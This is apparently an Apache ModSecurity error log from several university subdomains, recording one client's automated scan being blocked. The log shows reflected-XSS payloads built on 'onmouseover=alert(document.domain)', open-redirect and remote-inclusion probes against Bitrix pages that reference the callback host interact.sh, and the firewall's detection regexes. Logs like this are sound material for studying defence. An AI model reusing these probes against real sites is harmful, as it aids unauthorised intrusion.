[Tue Aug 29 11:52:19.626458 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnHQjEAAAAT"]
[Tue Aug 29 11:52:19.717659 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnkwhYAAAAY"]
[Tue Aug 29 11:52:19.718600 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnTlOwAAAAA"]
[Tue Aug 29 11:52:19.719103 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAjdQcMAAAAZ"]
[Tue Aug 29 11:52:19.744039 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnHQjMAAAAT"]
[Tue Aug 29 11:52:19.744655 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAlIBl4AAAAn"]
[Tue Aug 29 11:52:19.744694 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15g8Co-f0AAAnTlO0AAAAA"]
[Tue Aug 29 11:52:19.760104 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAn400MAAAAW"]
[Tue Aug 29 11:52:20.622959 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hMCo-f0AAAni-BIAAAAU"]
[Tue Aug 29 11:52:20.870568 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAnd3F0AAAAI"]
[Tue Aug 29 11:52:20.993022 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAni-BQAAAAU"]
[Tue Aug 29 11:52:21.135377 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn0GdYAAAAa"]
[Tue Aug 29 11:52:21.143945 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hcCo-f0AAAoEZMwAAAAB"]
[Tue Aug 29 11:52:21.173350 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAnoOqsAAAAf"]
[Tue Aug 29 11:52:21.199738 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAoEZM4AAAAB"]
[Tue Aug 29 11:52:21.865128 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoMLZsAAAAH"]
[Tue Aug 29 11:52:21.924094 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEUAAAAG"]
[Tue Aug 29 11:52:21.943928 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEYAAAAG"]
[Tue Aug 29 11:52:22.116777 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoEZNkAAAAB"]
[Tue Aug 29 11:52:22.144304 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hsCo-f0AAAoEZNoAAAAB"]
[Tue Aug 29 11:52:22.223663 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoEZN0AAAAB"]
[Tue Aug 29 11:52:22.824053 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hsCo-f0AAAoPuS8AAAAM"]
[Tue Aug 29 11:52:22.825241 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hsCo-f0AAAoN9bcAAAAJ"]
[Tue Aug 29 11:52:23.544745 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAmNp60AAAAQ"]
[Tue Aug 29 11:52:23.588668 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoEZOEAAAAB"]
[Tue Aug 29 11:52:23.592779 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAmNp64AAAAQ"]
[Tue Aug 29 11:52:23.594296 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnd3GcAAAAI"]
[Tue Aug 29 11:52:23.617172 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15h8Co-f0AAAnkwisAAAAY"]
[Tue Aug 29 11:52:23.617240 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/index.php"] 